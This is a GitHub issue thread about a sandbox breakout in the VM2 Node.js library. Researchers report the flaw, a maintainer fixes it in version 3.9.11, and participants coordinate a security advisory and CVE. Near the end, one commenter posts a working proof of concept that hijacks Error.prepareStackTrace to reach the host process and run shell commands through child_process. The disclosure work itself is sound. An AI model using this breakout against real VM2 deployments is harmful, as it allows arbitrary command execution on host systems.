Sandbox Breakout in VM2 #467
Comments
|
Thanks for reaching out, you can contact me under . |
|
Thanks for the report. This should be fixed in version 3.9.11. |
|
Hi @XmiliaH! Wanted to check whether you would consider creating a GitHub Security Advisory for this? It's a pretty lightweight process and a nice way to make sure updates are picked up by users as soon as possible. |
|
I do not have the necessary permissions in this repository to create advisories. |
|
Ah sorry of course, is @patriksimek around? 馃檹 |
|
@XmiliaH - do you happen to know who the admins are for this repo and would have the necessary permissions? Thanks in advance! |
|
It is patriksimek but they are not very active in this repo. |
|
I didn't find a way how to set roles for public repositories. Is migration to an organization the only way to allow @XmiliaH to contribute to GitHub Security Advisory? |
|
to create advisories, I think you have to make @XmiliaH an admin in this repo (under Collaborators settings), per this doc - https://docs.github.com/en/code-security/repository-security-advisories/permission-levels-for-repository-security-advisories alternatively, you can create an empty advisory and add @XmiliaH as a collaborator (maybe @oxeye-daniel too, since they have the most details), per this doc - https://docs.github.com/en/code-security/repository-security-advisories/adding-a-collaborator-to-a-repository-security-advisory - then they can fill it out and publish |
|
Unfortunately, I can't see any configuration of roles in this repository. I have created the empty advisory and shared access with both @XmiliaH and @oxeye-daniel. |
|
Thanks, @patriksimek, for opening the advisory; it is much appreciated. Thanks again everyone for the collaboration 馃檹 |
|
@oxeye-daniel Did you already request a CVE or should we do it through this advisory? |
|
@XmiliaH please request one through the advisory. |
|
In that case I have noting to add to the advisory. If @patriksimek has nothing to add they can publish the advisory as only they have the permissions to do so. |
|
Sounds good @XmiliaH; as I see it only @patriksimek has the permissions to create the advisory now. |
|
Just requested the CVE and published the advisory. Let me know if there's anything else to do. Thank you @oxeye-daniel for reporting the issue and @XmiliaH for a quick fix! |
|
Could you share the poc, I'm just curious. Why add Object.defineProperties(global, {
global: {value: global, writable: true, configurable: true, enumerable: true},
globalThis: {value: global, writable: true, configurable: true},
GLOBAL: {value: global, writable: true, configurable: true},
root: {value: global, writable: true, configurable: true},
Error: {value: LocalError}
}); |
|
After some exploration. I find the secrets from d9a7f3c. var vulnerabilities = function () {
// This line insert vulnerabilities!
global.Error.prepareStackTrace = (_, c) =>
c.map((c) => c.getThis()).find((a) => a && a.process);
const { stack } = new Error();
// now you can get process object from stack.process
console.info(stack.process.mainModule);
// and you can use process.mainModule.require to import any library to execute any commands
stack.process.mainModule.require('child_process').execSync('pwd');
};
vulnerabilities();some reference |
Hello 馃憢
The Oxeye research team has found a sandbox breakout vulnerability in VM2. We would like to share the in-depth analysis with you so the vulnerability can be fixed. We tried to contact
security@integromat.combut didn't get any response.Could you please share with me an email address to keep the issue private?
Best,
Oxeye Research Team
The text was updated successfully, but these errors were encountered: